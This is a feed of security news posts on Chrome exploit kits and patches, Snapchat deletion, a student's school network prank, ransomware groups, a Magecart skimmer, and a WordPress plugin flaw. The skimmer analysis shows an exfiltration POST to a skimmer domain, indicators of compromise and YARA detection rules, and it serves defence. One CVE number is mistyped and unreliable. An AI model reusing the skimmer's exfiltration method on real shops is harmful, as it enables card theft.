IT News

Exploit kits (EK) are not as widespread as they used to be. One of the reasons is likely that most exploit kits targeted software that is hardly ever used anymore. Internet Explorer, Silverlight, and Flash Player to name a few, have been deprecated, replaced, and quickly lost their user-base.

So, just when you start thinking there is one less threat to worry much about, researchers have found an exploit kit with a keen interest in Chrome. Which, from a business point of view, makes a lot of sense, since Chrome is close to becoming not just a market leader, but almost a monopolist in the browser market.

Chrome has, at the time of writing, a market share of around 65%. The only other browser that reaches a market share that is over 10% is Safari. So if you are in the business of compromising browsers that visit your website or watch your advertisement, having Chrome users on your target list is a big plus.

Or, as Malwarebytes’ Director of Threat Intelligence, Jérôme Segura, put it:

“The future of exploit kits is via Chrome exploits. This could either be an anomaly or the beginning of a new era with big implications for the years to come.”

Magnitude EK

Enter the Magnitude exploit kit. Researchers have found that the Magnitude EK is actively using two vulnerabilities to exploit Chromium-based browsers. Magnitude is used in malvertising attacks to infect victims who visit compromised websites and its payload of choice is the Magniber ransomware.

The vulnerabilities

CVE-2021-21224 is described as a type confusion in V8 in Google Chrome prior to 90.0.4430.85 which allows a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. V8 is Google’s open source high-performance JavaScript and WebAssembly engine. This vulnerability was patched in April.

CVE-2021-31956 is a Windows NTFS Elevation of Privilege (EoP) vulnerability. This vulnerability can be used in combination with CVE-2021-21224 to escape the Chromium sandbox. This vulnerability was patched in June.

PuzzleMaker

Practically the same combination of vulnerabilities was described in June when Microsoft fixed seven zero-days, including the CVE-2021-131956 we mentioned earlier. Back then, the attacker using these vulnerabilities was dubbed PuzzleMaker. At the time it was unknown which Chrome vulnerability was used by the attacker, but it’s highly likely that it was the same as Magnitude has been found leveraging now.

Payload

There is no malicious payload attached to the Magnitude exploits yet, the attack just exfiltrates the victim’s Windows build number. But reportedly, this is Magnitude EK’s standard procedure to test out new exploits, so this could change quickly if they start to see positive results.

How to protect yourself

It is only on rare occasions that we write about vulnerabilities and then tell you there isn’t much to worry about. But in this case, the only people that have anything to worry about are Windows users that browse the web using Chrome or Chromium based browsers (like Edge), but have disabled its automatic updates and haven’t updated since April. You would also have to run on a non-updated Windows system since June, or run Chrome with the –no-sandbox switch (not recommended). And even then all that would happen if you ran across the Magnitude EK (which usually focuses on South Korea) is getting fingerprinted.

But you do understand that you should update your OS and browser nonetheless, right?

Enable automatic updates

If you want to save yourself the trouble of manually installing updates, there are a few things you can do. For Google Chrome (under Windows) you can choose this page as one of the tabs that opens when you run the browser: chrome://settings/help. If there has been an update since the last time you closed your browser, this page will alert you and initiate a download of the update.

In Windows 10 you can select the Start button, then select Settings > Update & security > Windows Update. Select Advanced options, and then under Choose how updates are installed, select Automatic (recommended).

Stay safe, everyone!

The post Chrome targeted by Magnitude exploit kit appeared first on Malwarebytes Labs.

For the third time in a month Google has issued an update to patch for several security issues. This time the update patches 19 vulnerabilities, of which 5 are classified as “high” risk vulnerabilities.

In an update announcement for Chrome 95.0.4638.54, Google specifies the 16 vulnerabilities that were found by external researchers.

The CVEs

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

Below are the CVEs attributed to external researchers that got rated as high risk:

• CVE-2021-37981 (High CVSS 7.7) : Heap buffer overflow in Skia. The vulnerability exists due to a boundary error when processing untrusted HTML content in Skia. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger a heap-based buffer overflow and execute arbitrary code on the target system.
• CVE-2021-37982 (High CVSS 7.7): Use after free in Incognito. The vulnerability exists due to a use-after-free error within the Incognito component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.
• CVE-2021-37983 (High CVSS 7.7): Use after free in Dev Tools. The vulnerability exists due to a use-after-free error within the Dev Tools component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.
• CVE-2021-37984 (High CVSS 7.7): Heap buffer overflow in PDFium. The vulnerability exists due to a boundary error when processing untrusted HTML content in PDFium. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger a heap-based buffer overflow and execute arbitrary code on the target system.
• CVE-2021-37985 (High CVSS 7.7) : Use after free in V8. The vulnerability exists due to a use-after-free error within the V8 component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.

Heap buffer overflow

A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap. So, by creating a specially crafted input, attackers could use this vulnerability to write code into a memory location where they normally wouldn’t have access.

Use after free

Use after free (UAF) is a vulnerability caused by the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

Skia

Skia was developed as an open-source graphics library, written in C++ which abstracts away platform-specific graphics API. After Google acquired it in 2005, Chrome uses Skia for nearly all graphics operations, including text rendering.

Incognito

Incognito mode in Google Chrome – and other browsers—is essentially a setting on your web browser to disallow the storing of local data relating to the websites you surf. When surfing the web in this mode, your browsing history will not be recorded.

Dev Tools

Chrome DevTools is a set of web developer tools built directly into the Google Chrome browser. The Chrome DevTools are a set of web authoring and debugging tools that web developers can use to iterate, debug and profile their site.

V8

V8 is Google’s open source JavaScript and WebAssembly engine. Basically, it’s the engine that reads JavaScript V8 and translates the JavaScript code directly into machine code so that computers can actually understand it. This way the code can be run while browsing. WebAssembly is a binary format that allows you to run code from programming languages other than JavaScript on the web efficiently and securely. This format is handled by V8 as well.

PDFium

Pdfium.Net SDK is the leading .Net library for generating, manipulating and viewing files in the portable document format. It is used in Chrome for displaying PDFs and print preview. It’s also used in Android for PDF rendering.

How to protect yourself

If you’re a Chrome user, you should update to version 95.0.4638.54 as soon as possible. Users of other Chromium browsers should be on the lookout for updates that fix the vulnerabilities they will have in common.

The easiest way to update Chrome is to allow Chrome to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the working exploits. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

Stay safe, everyone!

The post Update now! Chrome fixes more security issues appeared first on Malwarebytes Labs.

Snapchat is an instant messaging app popular with youngsters that allows users to send pictures and videos that are only viewable for short periods.

But while hundreds of millions of daily active users consume and create content with Snapchat, not everyone is pleased with the mobile app.

One of the most significant concerns with Snapchat is that a recipient can record snaps without a creator’s knowledge or consent. And although Snapchat does notify a sender when a recipient takes a screenshot or records a video through proprietary software, some apps allow recipients to circumvent these checks.

If you no longer want to keep your Snapchat account, you can choose to delete it.

How to deactivate your Snapchat account

You may want to deactivate your Snapchat if you just want a break from the app. Currently, there’s no direct way to disable your account temporarily. The only way to deactivate Snapchat is to delete it.

After you delete your Snapchat, the platform gives you 30 days to change your mind before deleting your account permanently. So, to temporarily deactivate your Snapchat, you could cancel the deletion process before the 30-day period ends.

What happens if you delete your Snapchat account?

The instant you complete the Snapchat deletion process, an invisible 30-day timer starts. You now have just over four weeks to change your mind. After 30 days, Snapchat deletes the following data from its database:

• Account
• Account settings
• Friends
• Snaps
• Chats
• Story
• Device data
• Location data

According to Snapchat, some of your personal information may remain in the database for “certain legal, security and business needs.”

How to reactivate your Snapchat account

Reactivating your Snapchat account is pretty simple as long as you are still within the 30-day deletion window. Start your Snapchat app and log back in with your credentials. It may take up to 24 hours to reactivate your account.

How to download your Snapchat data

Your Snapchat data carries your login history, account information, profiles, snap and chat history, memories, friends, search history, Bitmoji, and more. You can download your Snapchat data before you delete your account to preserve the information.

1. Go to accounts.snapchat.com
2. Log into your account.
3. Click My Data and then click Submit Request.
4. You’ll receive a download link to your verified Snapchat email address.
5. Use the link to download your data.

How to delete your Snapchat account

1. Go to accounts.snapchat.com
2. Log into your account.
3. Scroll down until you see Delete My Account on the Manage My Account page.
4. Click Delete My Account.
5. Enter your username and password to confirm.
6. Click Continue to start the process.
7. Don’t log into the app again.
8. Your Snapchat account will be deleted permanently in 30 days.

Can you reactivate your Snapchat account after 30 days?

You won’t be able to log back into your account 30 days after starting the deletion process. However, you can create a new Snapchat account after your old one has expired.

How to protect yourself on social media

Maybe deleting Snapchat is one step too far for you at the moment. If that’s the case, there are steps you can take to help protect yourself while using Snapchat, and any other social media platforms.

Follow our selfie security measures to help prevent your sensitive media from getting into an abuser’s hands. Also avoid these six social media safety sins to help stay secure.

Setting a strong password is also advisable, and make sure each online account you have has a different password. Familiarise yourself with phishing attempts on mobile phones, to lessen the likelihood of you falling for a scam. Lastly, use security for your Android or iOS device to protect against stalkerware and online stalking incidents.

The post How to delete your Snapchat account appeared first on Malwarebytes Labs.

A student at a high school in Cook County successfully hacked into the Internet-of-Things (IoT) devices of one of the largest school districts in Illinois, and gave everyone a surprise.

Minh (aka @WhiteHoodHacker on Twitter) who attends Elk Grove—a name that curiously resembles the home town of legendary anti-hero, Ash Williams—rickrolled the entire Township High School District 214.

In case you don’t know, rickrolling is an internet meme and a type of bait and switch prank wherein people are expecting one thing (clicking a link, for example) but instead are shown a clip of the 1987 song “Never Gonna Give You Up” by Rick Astley instead.

“This story isn’t one of those typical rickrolls where students sneak Rick Astley into presentations, talent shows, or Zoom calls,” Minh writes in his personal blog, “I did it by hijacking every networked display in every school to broadcast ‘Never Gonna Give You Up’ in perfect synchronization. Whether it was a TV in a hall, a projector in a classroom, or a jumbotron displaying the lunch menu, as long as it was networked, I hacked it!”

In the post, Minh further revealed that everything started during his freshman year, a time he admitted was “the beginning of my script kiddie phase”. With the help of friends, he was able to scan and find more than 8 million IPs in the internal district network. With that many IPs, he was bound to find devices that were exposed—and he certainly did.

Security cameras weren’t the only devices exposed to the student network. Minh was also able to have complete access to the district’s Internet Protocol Television (IPTV) system, a system that delivers multimedia content over IP-based networks. However, he wasn’t able to pull off the school prank he’d been planning until three years later.

Thanks to scheduling changes schools had to introduce in response to COVID-19 restrictions, Minh and his crew were able to pull off their scheme while avoiding disrupting classes and—yikes!—significant tests. Minh also said that they were prepared to abort the operation if they found that tests were taking place.

Once Minh had finished his prank, he sent a pentest report to the district’s technical supervisors.

“A few days after sending the report through the anonymous email account, we received an email response from D214’s Director of Technology,” Minh continued in his blog, “The director stated that because of our guidelines and documentation, the district would not be pursuing discipline. In fact, he thanked us for our findings and wanted us to present a debrief to the tech team! Later, he revealed the superintendents themselves reviewed and were impressed by our report!”

This is not a typical response from an organization when someone steps forward to show them their technological vulnerabilities. Many in the cybersecurity and tech industries know someone—or have themselves experienced—getting burned by groups or individuals for simply letting them know about what’s wrong with their systems and what they can do better. Let us not forget those two physical penetration testers getting arrested and jailed for doing a job they were hired to do.

Of course, something like this could happen even when there’s support for a bug bounty program. Take, for example, the case of drone-maker, DJI, who offered a bug bounty program but then decided to modify the terms of its scope and attack the security researcher who found major flaws in its product.

It’s no surprise, then, to see Minh’s peers expressed distrust against the D214 administration, even though the latter was open to the possibility of working with him and his crew to remediate and audit the problems.

“We decided I would reveal myself to present our debrief slides with the others remaining anonymous in the Zoom meeting,” Minh continues, “I had planned on announcing my involvement from the beginning since I wanted to publish this blog post. (I was also pretty much the prime suspect anyways.) But, just in case, I scheduled the debrief to take place after I graduated.”

At the end of the day, everything went “extremely well” for everyone involved. Suffice to say, Minh and his crew were one of the lucky ones to belong to a district that is objective enough to see past the prank and focus on the underlying technological vulnerabilities that made it possible to begin with.

The district has also displayed a stance that potentially opens great cybersecurity opportunities not only to Minh and his crew but also to those who aspire to do what they have done in the name of vulnerability disclosure (sans the pranks, of course). This is something that the industry welcomes and what is urgently needed.

“This has been one of the most remarkable experiences I ever had in high school and I thank everyone who helped support me,” Minh concluded.

Let us be the first to say that this fine lady is not the only one doing the happy dance.

—

* Image header is taken by Tom Tran

The post High school student rickrolls entire school district, and gets praised appeared first on Malwarebytes Labs.

With some pests you hope they never recover from a blow. It’s almost too good to be true, but one can hope. This is one of them. The REvil ransomware group has shut down their operation for the second time this year after losing control over their Tor-based domains.

Shutdown number 1

REvil’s first shutdown was in July 2021, after the gang successfully pulled off a supply chain attack against Managed Service Provider Kaseya. Shortly after this widespread incident all online traces of the gang weirdly seemed to vanish from the internet. In particular, the payment sites and data leak site were taken offline, along with the infrastructure for victims to make Bitcoin payments and get the decryption tools.

A lot of speculation ensued but there were no definite answers. Some said the group had joined forces with the DarkSide group to come back stronger under the name BlackMatter. Others claimed a victory for the good guys, hoping, almost against the odds, that some of the countermeasures taken by governments across the globe were starting to produce results. The Kaseya attack certainly had such an impact worldwide that it brought the full attention of international law enforcement to the group.

The group’s own story is that one of the group’s leaders took down the servers and disappeared with the group’s money, which left them unable to pay many of their affiliates.

The comeback

Unfortunately, a few months later, the REvil ransomware gang made a comeback, attacking new victims and publishing stolen files on a data leak site. The Tor payment and negotiation sites suddenly turned back on as well, with the timers for all prior victims reset to the day the infrastructure went offline.

Shutdown number 2

This time the shutdown looks to be a result of a hostile take-over. This week, the gang’s Tor payment portal and data leak blog were allegedly hijacked, and a spokesperson for the group said the server was compromised. The threat actor’s post on an underground forum said the group’s Tor services were hijacked and replaced to point to a different location.

And again speculation comes into play.

Allegedly, many affiliates were still waiting to be compensated for the losses they suffered when the group last disappeared. On top of that there are rumors that the developers of the ransomware hid a backdoor in their code, so that they can forego their affiliates and provide decryption keys directly to victims.

This doesn’t really make sense, in my view. But it is possible that a key exists that can decrypt the files of multiple, or maybe even all, victims. It wouldn’t be the first time.

Either way, cybercriminals that operate under covert identities rely on a strong base of trust if they want to continue to work together. And that trust in REvil seems to be at a low level, and may be totally gone depending on how this disappearing act turns out.

torcc file

In all the reports about the server takeover there is a mention of the torcc file. This is a text file that holds the configuration details for a Tor instance. The spokesperson for REvil claimed that the path to their hidden service was deleted and the attacker raised their own, hoping that they would go there. Basically, the hidden service in the torcc file is what points visitors of an .onion site to the correct webserver. Being able to alter that file requires a high level of access.

So, who do you think is responsible? Let us know in the comments. I have prepared a few choices, but obviously you can add your own options.

Option 1: An angry affiliate that has had enough.

Option 2: It was an inside job and yet another admin fled the scene with the money.

Option 3: Law enforcement shut down the operation and is now after the people behind it.

Option 4: A white hat hacker that wishes to remain anonymous for safety’s sake.

Option 5: It was just a glitch and they will be back next week, maybe under another name.

Option 6: It was the former group’s leader who was not amused to learn about the comeback.

Wink if you are not guessing, but know for a fact.

The post REvil ransomware disappears after Tor services hijacked appeared first on Malwarebytes Labs.

Despite promises made by the BlackMatter ransomware gang about which organizations and business types they would avoid, multiple US critical infrastructure entities have been targeted. Now, the Federal Bureau of Investigation (FBI), in conjunction with the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA) have issued a warning on BlackMatter ransomware, and tips on how to avoid it.

BlackMatter ransomware

BlackMatter is a ransomware-as-a-service (RaaS) that allows the developers to profit from cybercriminal affiliates who deploy it against victims. BlackMatter is a possible rebrand of DarkSide, and has some similarities to REvil. According to its own site:

 “The project has incorporated in itself the best features of DarkSide, REvil and LockBit”

Promises, promises

On their own leak site, the BlackMatter gang claim not to attack companies belonging to the following six industries, with the caveat that if or when any companies in these industries do get hit, such victims should simply ask for a free decryption:

• Hospitals
• Critical infrastructure facilities (nuclear power plants, power plants, water treatment facilities)
• Oil and gas industry (pipelines, oil refineries)
• Defense industry
• Non-profit companies
• Government sector

A recent high-profile victim of BlackMatter was Japan-headquartered manufacturer Olympus which, among others, produces medical equipment. BlackMatter is also named as the likely culprit behind the cybersecurity incident affecting US farmers’ cooperative NEW Cooperative.

All in all, the BlackMatter group have performed attacks against several US-based organizations and demanded ransoms ranging from 80 thousand to 15 million US dollars in Bitcoin and Monero.

How to avoid BlackMatter ransomware

CISA alert lists technical details in the form of Tactics, Techniques, and Procedures (TTPs) based on the MITRE ATT&CK for Enterprise framework, detection signatures, and mitigations.

Most of the mitigation strategies will look very familiar to our regular readers, but it’s always worth repeating them. And you may spot some new ones.

• Use strong and unique passwords. Passwords shouldn’t be reused across multiple accounts or stored on a system where an adversary may gain access. Devices with local administrative accounts should implement a password policy that requires strong, unique passwords for each individual administrative account.
• Implement and require Multi-Factor Authentication (MFA) where possible and especially for webmail, virtual private networks, and accounts that access critical systems.
• Patch and update. Keep all operating systems and software up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
• Limit access to resources over the network. Remove unnecessary access to administrative shares, restrict privileges to only the necessary service or user accounts and perform continuous monitoring for anomalous activity. Use a host-based firewall to only allow connections to administrative shares via Server Message Block (SMB) from a limited set of administrator machines.
• Implement network segmentation and traversal monitoring. This will hinder an adversary from learning the organization’s enterprise environment. Many attackers use system and network discovery techniques for network and system mapping.
• Implement time-based access for accounts set at the admin-level and higher. BlackMatter operatives have been noticed to use compromised credentials during non-business hours, which allows them to go undetected for longer periods.
• Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities that run from the command line.
• Implement and enforce backup and restoration policies and procedures. Doing backups right is not as easy as some may think. Make sure they are recent, cannot be altered or deleted, and cover the entire organization’s data infrastructure.

Furthermore, CISA, the FBI, and NSA urge critical infrastructure organizations to apply the following additional mitigations to reduce the risk of credential compromise:

• Disable the storage of clear text passwords in LSASS memory.
• Consider disabling or limiting New Technology Local Area Network Manager (NTLM) and WDigest Authentication.
• Implement Credential Guard for Windows 10 and Server 2016.
• Minimize the Active Directory (AD) attack surface to reduce malicious ticket-granting activity. Ticket Granting services can be used to obtain hashed credentials that attackers attempt to crack or use in pass-the-hash methods.

Bad things happen

If, despite your best efforts, a ransomware incident occurs at your organization, CISA, the FBI, and NSA say US-based organizations should:

• Follow the Ransomware Response Checklist on p. 11 of the CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
• Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware.
• Report incidents immediately to the FBI at a local FBI Field Office, CISA at us-cert.cisa.gov/report, or the US Secret Service at a US Secret Service Field Office.
• Apply incident response best practices found in the joint Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Stay safe, everyone!

The post Protect yourself from BlackMatter ransomware: Advice issued appeared first on Malwarebytes Labs.

This blog post was authored by Jérôme Segura

Although global e-commerce is continuing to grow rapidly, it seems as though Magecart attacks via digital skimmers have not followed the same trend. This is certainly true if we only look at recent newsworthy attacks; indeed when a victim is a large business or popular brand we typically are more likely to remember it.

From a research standpoint, we have observed certain shifts in the scope of attacks. For instance, the different threat actors are continuing to expand and diversify their methods and infrastructure. In a blog post about Magecart Group 8, we documented some of the various web properties used to serve skimmers and exfiltrate stolen data.

But at the end of the day, we only know about attacks that we can see, that is until we discover more. Case in point, one particular skimmer identified as q-logger, has been active for several months. But it wasn’t until we started digging further that we realized how much bigger it was.

Q-logger origins

This skimmer was originally flagged by Eric Brandel as q-logger. Depending on how much you enjoy parsing JavaScript you may have a love/hate relationship with it. The code is dense and using an obfuscator that is as generic as can be, making identification using signatures challenging.

This skimmer can be found loaded directly into compromised e-commerce sites. However, in the majority of cases we found it loaded externally.

The loader

The loader is also an encoded piece of JavaScript that is somewhat obscure. It is injected inline within the DOM right before the text/x-magento-init tag or separated by copious amounts of white space.

One way to understand what the code does is by using a debugger and setting a breakpoint at a particular spot. It is best to either use an already compromised site or bypass the check for the address bar (onestepcheckout).

We can now see the purpose of this script: it is to load the proper skimmer.

The skimmer

As mentioned previously, the skimmer is quite opaque and makes debugging effort difficult and lengthy.

To cut to the chase, the skimmer exfiltrates data via a POST request to the same domain name where the JavaScript is loaded from.

POST https://filltobill5.casa/ HTTP/1.1
Host: filltobill5.casa
[obfuscated data]

Threat actor and victims

We were able to collect a few indicators from the threat actor behind this campaign. One was the use of netmail.tk, also observed by Luke Leal, for registering skimmer domains.

Although there are clusters of domains from the same registrant, we see that they are trying to compartmentalize their infrastructure and hide the hosting provider’s true IP address. They also register domains en masse, which allows them to defeat traditional blocklists.

We don’t have a good estimate of how prevalent this campaign is, but we certainly run into it regularly while monitoring e-commerce sites for malicious code. The victims are various small businesses with an online shop running Magento.

Conclusion

The large number of e-commerce sites that are running outdated versions of their CMS is a low hanging fruit for threat actors interested in stealing credit card data. In a sense, there is always a baseline of potential victims that can be harvested.

And every now and again, some opportunities appear. They could be as simple as a zero-day in a plugin or CMS, or maybe an entry point into more valuable targets via a supply-chain attack.

Threat actors are always ready to pounce on those and may well have established their infrastructure ahead of time, waiting for such opportunities.

Malwarebytes customers are protected against this skimmer.

Indicators of Compromise

Email addresses (registrant)

• wxugvvvu@netmail[.]tk
• isgskpys@netmail[.]tk
• zulhqmnr@netmail[.]tk
• yzzljjkmc@emlhub[.]com
• foyiy11183@macosnine[.]com

Skimmer domains

Skimmer URLs

YARA rules

rule qlogger_loader_WebSkimmer : Magecart WebSkimmer
{
    meta:
        author = "Malwarebytes"
        description = "Magecart (q-logger loader)"
        source = "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/"
        date = "2021-10-19"

    strings:
        $regex = /"load",function(){(function(){/
        $regex2 = /while(!![]){try{var/
        $regex3 = /(w['shift']());}}}/

    condition:
        all of them
}

rule qlogger_skimmer_WebSkimmer : Magecart WebSkimmer
{
    meta:
        author = "Malwarebytes"
        description = "Magecart (q-logger skimmer)"
        source = "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/"
        date = "2021-10-19"

    strings:
        $regex = /return(!!window[w{2}(/
        $regex2 = /w()&&console[/

    condition:
        all of them
}

The post q-logger skimmer keeps Magecart attacks going appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs

• Google warns some users that FancyBear’s been prowling around
• Inside Apple: How macOS attacks are evolving
• The joy of phishing your employees
• ExpressVPN made a choice, and so did I: Lock and Code S02E19
• Update now! Apple patches another privilege escalation bug in iOS and iPad OS
• Ransom disclosure act would mandate ransomware payment disclosing
• Patch now! Microsoft fixes 71 Windows vulnerabilities in October patch Tuesday
• “Free Steam Game” scams on TikTok are Among Us
• Inside Apple: How Apple’s attitude impacts security
• Adblocker promises to block ads, injects them instead
• What is an .exe file? Is it the same as an executable?

Other cybersecurity news

• VirusTotal reports 95% of ransomware spotted targets Windows (Source: The Register)
• Popular Makerbot site breached (Source: Troy Hunt)
• Leave no trace: how a teenage hacker lost himself online (Source: The Guardian)
• “Clumsy” BlackByte malware reuses crypto keys (Source: Dark Reading)
• Botnet gang steals millions with surprisingly simple trick (Source: ZDNet)
• Minecraft is a hotbed for malware: here’s why (Source: Make Use Of)
• Prioritizing cybersecurity awareness training in the wake of phishing attacks (Source: Infosecurity Magazine)
• FBI, CISA warn water facility operators of ongoing malicious cyber activity (Source: Cyberscoop)

Stay safe, everyone!

The post A week in security (Oct 11 – Oct 17) appeared first on Malwarebytes Labs.

Multiple vulnerabilities have been found in the popular WordPress plugin WP Fastest Cache during an internal audit by the Jetpack Scan team.

Jetpack reports that it found an Authenticated SQL Injection vulnerability and a Stored XSS (Cross-Site Scripting) via Cross-Site Request Forgery (CSRF) issue.

WP Fastest Cache

WP Fastest cache is a plugin that is most useful for WordPress-based sites that attract a lot of visitors. To save the RAM and CPU time needed to render a page, the plugin creates caches of static html files, so that the pages do not need to be rendered for every visit separately.

This results in a speed improvement which in turn improves the visitor experience and the SEO ranking of the site. WP Fastest Cache is open source software and comes in free and paid versions.

WP Fastest Cache currently has more than a million active installations according to its WordPress description page.

Authenticated SQL Injection vulnerability

This particular vulnerability can only be exploited on sites where the Classic Editor plugin is both installed and activated.  Classic Editor is an official plugin maintained by the WordPress team that restores the previous (“classic”) WordPress editor and the “Edit Post” screen.

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database, and has become a common issue with database-driven web sites. This bug could grant attackers access to privileged information from the affected site’s database, such as usernames and (hashed) passwords.

Stored XSS issue

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one is listed as CVE-2021-24869 and received a CVSS score of 9.6 out of 10.

Cross-site request forgery (CSRF), also known as one-click attack or session riding, is a type of exploit of a website where unauthorized commands are submitted from a user that the web application trusts. A CSRF attack forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering, an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is an administrative account, CSRF can compromise the entire web application.

Cross-Site Scripting (XSS) is a vulnerability that exploits the client environment within the browser, allowing an attacker to inject arbitrary code onto the target’s instance and environment. Basically the application does not process received information as intended. An attacker can use such a vulnerability to create input that allows them to inject additional code into a website.

In this case it was possible due to a lack of validation during user privilege checks. The plugin allowed a potential attacker to perform any desired action on the target website. Hence, an adversary could even store malicious JavaScript code on the site. Which in case of an online shop could be a web skimmer designed to retrieve customer payment information.

Mitigation

Website owners should download and install the latest version of the WP Fastest Cache plugin (version 0.9.5) in which these vulnerabilities have been fixed. Jetpack recommends users update as soon as possible, as both vulnerabilities have a high technical impact if exploited. At the time of writing 650,000 instances were still on a vulnerable version.

For more general tips on how to secure you CMS, we recommend reading our article on How to secure your content management system.

Stay safe, everyone!

The post Multiple vulnerabilities in popular WordPress plugin WP Fastest Cache appeared first on Malwarebytes Labs.

On October 12, after interviewing US Secretary of Homeland Security Alejandro Mayorkas, USA TODAY’s editorial board warned its readers about a dangerous new form of cyberattack under this eye-catching headline:

“The next big cyberthreat isn’t ransomware. It’s killware. And it’s just as bad as it sounds.”

But while “killware” sounds scary, the term itself is unhelpful when describing the many types of cyberattacks that, like USA TODAY wrote, “can literally end lives,” and that’s because nearly any type of hack, no matter the intention, can result in death. Complicating this is the fact that the known cyberattacks that have allegedly led to deaths already have a category: ransomware. Further, the term “killware” can confuse antivirus customers seeking reassurance that their own vendor is protecting them from this threat, but antivirus vendors do not stop attacks based on intent, they stop attacks based on method.

As an example, Malwarebytes Director of Threat Intelligence Jerome Segura said that Malwarebytes does not have any specific Indicators of Compromise (IOCs) for “killware” and that, instead, “we continue to protect our customers with our different layers of protection.”

“Many of our layers are ‘payload indifferent’ meaning we block the attack regardless of what it is meant to do (it could be to ransom, it could be to destroy MBRs, or anything in between). We don’t focus on that end payload so much as blocking how an attacker might get there.”

Think of it like this: Locksmiths don’t develop one set of locks to prevent robberies and another set of locks to prevent assault—they develop locks to primarily prevent break-ins, no matter what an invader has planned.

“Killware” is too loose a term to be useful

In February, an employee for a water treatment facility in Oldsmar, Florida, saw the mouse on his computer screen moving around without his involvement. The employee, according to Wired, thought this was somewhat normal, as his workplace used a tool that allowed for remote employees and supervisors to take control of computers at the plant itself. But when the employee saw the cursor move around a second time in the same day, he reportedly saw an attempt by an intruder to maliciously increase the chemical levels at the water treatment facility, upping the amount of sodium hydroxide—which can be corrosive in high quantities—to dangerous levels.

In USA TODAY’s article about “killware,” Secretary Mayorkas pointed directly to this cyberattack. It was different than other cyberattacks, Mayorkas said, because it “was not for financial gain but rather purely to do harm.”

But if the attack was truly meant to harm or even kill people—which it very well may have—what good does it do to associate it with this new “killware” category? “Killware,” after all, still has the “ware” suffix in it, meaning that it should have at least some relationship to a piece of software, or a program, or perhaps many lines of code.

The breach at the Oldsmar water plant, however, may have involved no malware at all. No spear-phishing attack against an executive’s personal device. No surreptitious implantation of spyware to collect admin credentials. No initial breach and lateral movement. Instead, there’s a frustratingly simpler theory: Reused passwords across the entire water treatment plant for a crucial, remote access tool.

Following the attack at the Oldsmar facility, the state of Massachusetts issued a cybersecurity advisory notice to public water suppliers, detailing a few basic cybersecurity flaws that may have played a role in the attack. As the state said in its advisory:

“The unidentified actors accessed the water treatment plant’s [supervisory control and data data acquisition (SCADA)] controls via remote access software, TeamViewer, which was installed on one of several computers the water treatment plant personnel used to conduct system status checks and to respond to alarms or any other issues that arose during the water treatment process. All computers used by water plant personnel were connected to the SCADA system and used the 32-bit version of the Windows 7 operating system. Further, all computers shared the same password for remote access and appeared to be connected directly to the Internet without any type of firewall protection installed.”

Further, in testifying about the attack to the House Committee on Homeland Security, former Cybersecurity and Infrastructure Security Agency Director Chris Krebs said that the attack was “very likely” caused by “a disgruntled employee,” wrote Washington Post report Ellen Nakashima.

So, the attack may have come from a former employee, who may already have possessed the remote access credentials, which were already the same credentials for every user at the water treatment facility, which also lacked firewall protections.

What part of this attack chain, then, should be labeled “killware”?

Truthfully, none, and that’s because labeling anything as “killware” ignores the basic facts about cybersecurity defenses. Cybersecurity vendors do not categorize or identify attacks based on their final intentions. A reused password is a bad idea, but it isn’t a bad idea that can only be used to harm people. Lacking firewalls protections, similarly, are poor practice, but they aren’t poor practice that can only be used to threaten people’s lives.

In fact, even if cybersecurity vendors wanted to categorize attacks by intention, how could they?

Earlier this year, a bereaved mother filed a lawsuit against a hospital in Alabama that, she claims, failed to provide adequate care to her baby because the hospital was hamstrung by a ransomware attack. The hospital’s inability to properly care for her baby, the lawsuit said, eventually led to her child’s death. Nearly a year prior, a patient’s death during a ransomware attack on a German hospital brought similar allegations—though no lawsuits—but those allegations fell apart in the months following the attack, as the chief public prosecutor tasked with investigating the attack concluded that, even without the treatment delays caused by the ransomware attack, the patient likely would have died.

Neither of these situations involved hackers whose end goal was purely to harm or kill people. The intent, as is clear in almost every single ransomware attack, is to get paid. Ransomware attacks on hospitals, specifically, may use the threat of death as leverage for their end goal, but even the threat of death does not alter the end goal, which is to get paid potentially millions of dollars. If we even tried to use the “killware” term on these attacks, they wouldn’t fit, despite the end result.

